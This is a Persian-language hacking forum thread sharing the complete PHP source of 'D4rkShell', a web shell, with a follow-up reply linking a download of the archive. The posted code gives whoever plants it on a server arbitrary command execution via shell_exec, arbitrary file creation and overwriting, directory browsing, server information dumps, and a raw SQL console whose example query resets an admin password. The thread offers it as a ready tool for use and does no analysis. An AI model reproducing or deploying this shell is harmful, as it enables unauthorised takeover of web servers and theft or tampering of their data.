SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

sheller private

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • sheller private

    [php]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>\\--------------- D4rkShell V1.0.0 ---------------//</title> <style type="text/css"> body,td,th { color: #0C0; font-family: "Courier New", Courier, monospace; } body { background-color: #000; text-align: center; } a:link { color: #960; text-decoration: none; } a:visited { color: #930; text-decoration: none; } .title { text-align: center; font-size: 36px; font-family: "Comic Sans MS", cursive; } .background_table { } a:hover { text-decoration: underline; } a:active { text-decoration: none; } </style> </head> <?php //------------------------------------------------------------------------------------------------------------------// // shell code maked by D4rkC0d3 offer to Datacoder Security Team // // D A T A C O D // // // // S E C U R I T Y T E A M // // // // // // SPTanks to my best frindes: Immortal-boy , NEO, N3tdev!l, Skitt3r, H-Sk33py , r00t // //------------------------------------------------------------------------------------------------------------------// error_reporting(0); ?> <body> <table width="1075" height="492" border="0"> <tr> <td height="488" align="center" valign="top"><table width="442" height="68" border="0"> <tr> <td height="64">D4rkShell V1.0.1</td> </tr> </table> <table width="883" border="1"> <tr> <td width="637" height="95"><p><font size=2 color=red>PHP version : <?php echo phpversion();?></font><font color="#339966"><b> And <?php //ghesmate chek kardane safe_mode if( ini_get('safe_mode') ) { print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>'; } else { print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>'; } ?> </b></font></p> <p><?php echo getenv("SERVER_SOFTWARE");?><?php echo php_uname('s')." ".php_uname('r')." ".php_uname('v'); ?></p></td> <td width="230" align="center" valign="middle"><p><a href="http://datacoders.org">www.datacoders.org</a></p> Your IP<br /> <?php echo $_SERVER["SERVER_ADDR"]; ?></td> </tr> </table> <table width="857" border="0" align="center"> <tr> <td width="49" align="center" valign="middle"><a href="<?php echo $_SERVER['PHP_SELF'];?>?command=info">Info</a></td> <td width="9" align="center" valign="middle" bgcolor="#006600">&nbsp;</td> <td width="129" align="center" valign="middle"><a href="<?php echo $_SERVER['PHP_SELF'];?>?command=filecommand">File Command</a></td> <td width="10" align="center" valign="middle" bgcolor="#006600">&nbsp;</td> <td width="137" align="center" valign="middle"><a href="<?php echo $_SERVER['PHP_SELF'];?>?command=shellcommand">Shell Command</a></td> <td width="11" align="center" valign="middle" bgcolor="#006600">&nbsp;</td> <td width="127" align="center" valign="middle"><a href="<?php echo $_SERVER['PHP_SELF'];?>?command=dbcommander">Db Commander</a></td> <td width="11" align="center" valign="middle" bgcolor="#006600">&nbsp;</td> <td width="140" align="center" valign="middle"><a href="<?php echo $_SERVER['PHP_SELF'];?>?command=md5">Md5 generator</a></td> <td width="28" align="center" valign="middle">&nbsp;</td> <td width="52" align="center" valign="middle">&nbsp;</td> <td width="46" align="center" valign="middle">&nbsp;</td> <td width="54" align="center" valign="middle">&nbsp;</td> </tr> </table> <p> <?php //------------------------ Codedby D4rkC0de --------------------------------------- if(isset($_GET['command'])){ //moteghayer safhe $command = $_GET['command']; //switch kardan dar page ha switch ($command) { case "info": if(isset($_POST['more_btn'])){//start if--- ?><table width='880' height='235' border='1'> <tr> <td><?php while (list($var,$value) = each ($_SERVER)) { echo "$var => $value <br />"; } ?> </td> </tr> </table> <?php }else{//end if--- echo "<table width='880' height='235' border='1'> <tr> <td>Document ROOT : ".$_SERVER['DOCUMENT_ROOT']."<br>PWD : ".getcwd()."<br>Server SOFTWARE : ".$_SERVER["SERVER_SOFTWARE"]."<br>Server TMP : ".$_SERVER["TMP"]."<br>Server ADMIN : ".$_SERVER["SERVER_ADMIN"]."<br>System ROOT : ".$_SERVER["SystemRoot"]."<br>Server ADDRESS : ".$_SERVER["SERVER_ADDR"]."<br>Your IP : ".$_SERVER["REMOTE_ADDR"]." <form method='post'><input type='submit' name='more_btn' value=' More '></form> </td> </tr> </table>"; } break; case "filecommand": ?> <table width="857" border="1"> <tr> <td> Here you can make all file with all type. <form method="POST" name="form1" > <p><input type="text" size="20" name="filename1" value="falename.php"><input type="submit" name="makefile_btn" value="Make file"></p> <p><textarea name="filecode1" style="width:875px;height:246px;">Your file code must be here</textarea></p> <?php //file maker $textmake=$_POST['filecode1']; $filename = $_POST['filename1']; //entekhab masire sakhte file tavasote karbar if(isset($_POST['dir_btn_send'])){ $dirname=$_POST['directname']; }else{$dirname=$_POST['directname']; } if(isset($_POST['makefile_btn'])) { //"$dirname".'/'."$filename" masire jari mibashad ke entekhab mikonim if (!file_exists("$dirname".'/'."$filename")){ $filemake=fopen("$dirname".'/'."$filename","w+",1); fwrite($filemake,$textmake); fclose($filemake); echo "<font size='4' color=''>new file maked</font>"; } elseif(file_exists("$dirname".'/'."$filename")){ $filemake=fopen("$dirname".'/'."$filename","w+",1); fwrite($filemake,$textmake); fclose($filemake); echo "<font size='4' color='yellow'>old file edited</font>"; } } //------------------------ Codedby D4rkC0de --------------------------------------- ?> <table> <tr> <td width="1%" height="200" bgcolor="#000000"><p align="left" ><font color="#0C0" > <?php $droot= getcwd(); //show direct commend echo "$dirname"; if(isset($_POST['directname'])==""){ $dirname="$droot"; $dn=opendir($dirname); while((($file=readdir($dn)))){ echo "$file"."<br>"; } }elseif(!isset($_POST['directname'])==""){ $dirname=$_POST['directname']; $dn=opendir($dirname); while((($file=readdir($dn)))){ echo "$file"."<br>"; } } ?> </font> <form method="post"> <p><input method="text" name="directname" value="<?php if(($_POST['directname'])==""){echo "$droot";} elseif(!(($_POST['directname'])=="")) {echo "$dirname";}?>"> <input type="submit" name="dir_btn_send" value="Show Directory"></p> </form> </td> </tr> </table> <?php break; //Data Base commander----------------------------------------------- case "dbcommander": if(isset($_POST['send_query'])) { $hostname=$_POST['stname']; $user=$_POST['user']; $pass=$_POST['pass']; $dbname=$_POST['dbname']; $query_text=$_POST['query']; //connection be sql server $SQL = mysql_connect("$hostname","$user","$pass"); mysql_select_db("$dbname",$SQL); if(!$SQL) echo'Cann\'t connect to database'; //conect shodan be sql va ejraye query $result = mysql_query("$query_text",$SQL); while ($row = mysql_fetch_assoc($result)) { $QuEry = $row['$query_text']; } mysql_free_result($result); if($SQL) { echo "<font size='4'color='#00f000'><center>commande successful.</center></font>"; }else{ echo"<font size='4' color='#ff0000'><br>Command can't run, hostname/username/password/dbname isn't true</font>"; } } ?> <table width="880" border="1"> <tr> <td width="850" height="247" align="center" valign="middle"><form method="post"> <center> //Example <font face='Verdana' color='#ff0000' style='font-size:10pt'><b>Example : </b></font> <font color='#00f000'> Hostname: localhost / localhost:3046 and username: NOPO password: 123456 databasename: db_forum</font> <br>.............................................. .......................<br> <font face='Verdana' color='#ff0000' style='font-size:10pt'><b>Command Example : </b></font> <font color='#00f000'> UPDATE admin SET password='farshid' WHERE userid=1;</font> <!-- baghiye-----------------------------------<DataC0ders Team>------------------------------------------ --> <br />Hostname: <input name="stname" type="text" value="" size="15" /> Username: <input name="user" type="text" value="" size="15" /> password: <input name="pass" type="text" value="" size="15" /> dbName: <input name="dbname" type="text" value="" size="15" /> <textarea name='query' cols="107" rows="12"></textarea> <input type="submit" value=" Send " name="send_query" /> </center> </form></td> </tr> </table> <p> <?php //------------------------ Codedby D4rkC0de --------------------------------------- break; case "shellcommand"; ?> <table width="880" height="234" border="1"> <tr> <td align="center" valign="middle"> <table width="878" height="335" border="0"> <tr> <td height="57" align="center" valign="top">Type your command here:<br /><form name="form1" method="post" action=""> shell_exec : <label for="send_shell_command"></label> <input name="send_shell_command" type="text" id="send_shell_command" value="Help" size="40"> <input type="submit" name="send_shell_btn" id="send_shell_btn" value=" Send "> </form></td> </tr> <tr> <td align="center" valign="middle"><?php //ejraye commands if(isset($_POST['send_shell_btn'])){ $commands = $_POST['send_shell_command']; $dir = shell_exec("$commands"); echo $dir."<br>"; } ?></td> </tr> </table> </td> </tr> </table> <?php break; //------------------------ Codedby D4rkC0de --------------------------------------- case "md5": ?> <table width="880" height="234" border="1"> <tr> <td align="center" valign="middle"> Type your word for make hash.<br /> <form method='POST'> <p><input type='md5_text' name='md5_text' id="md5_text"> <input type='submit' name='md5_send' value='make hash'> </form> <br> <?php if(isset($_POST['md5_send'])) { if(empty($_POST['md5_text'])) { die ('you don\'t type word for make hash'); } $word=$_POST['md5_text']; $word2 = md5("$word"); print("<font color='#ff0000'>$word</font> hash = <b>$word2</b>"); } ?></td> </tr> </table> <?php break; default: echo " <table width='880' height='234' border='1'> <tr> <td align='center' valign='middle'> <p>This is Open source shell.</p> <p>Please make it better by your idea </p> <br/> <p>Our site :</p> <a href='http://www.datacoders.org'>Datacoders Security Team</a> </td> </tr> </table> "; //akhare avalin if ---------------------------------------- } }else{echo " <table width='880' height='234' border='1'> <tr> <td align='center' valign='middle'> <p>This is Open source shell.</p> <p>Please make it better by your idea </p> <br/> <p>Our site :</p> <a href='http://www.datacoders.org'>Datacoders Security Team</a> </td> </tr> </table> "; } ?> </p></td> </tr> </table> <table width="880" border="0"> <tr> <td align="center" valign="middle"> &copy; DataCoders.org</td> </tr> </table> </body> </html>[/php]


    به پایان رسیدیم اما نکردیم آغاز
    فرو ریخت پرها نکردیم پرواز

  • #2
    RE: sheller private

    بابا این رو درست کد کن معلوم نیست چجوریه ...
    فایل رو ضمیمه کن لطفا" !

    نظر


    • #3
      RE: sheller private

      از لینک زیر دانلود کنید

      http://s3.picofile.com/file/7421802468/dark.rar.html
      به پایان رسیدیم اما نکردیم آغاز
      فرو ریخت پرها نکردیم پرواز

      نظر

      صبر کنید ..
      X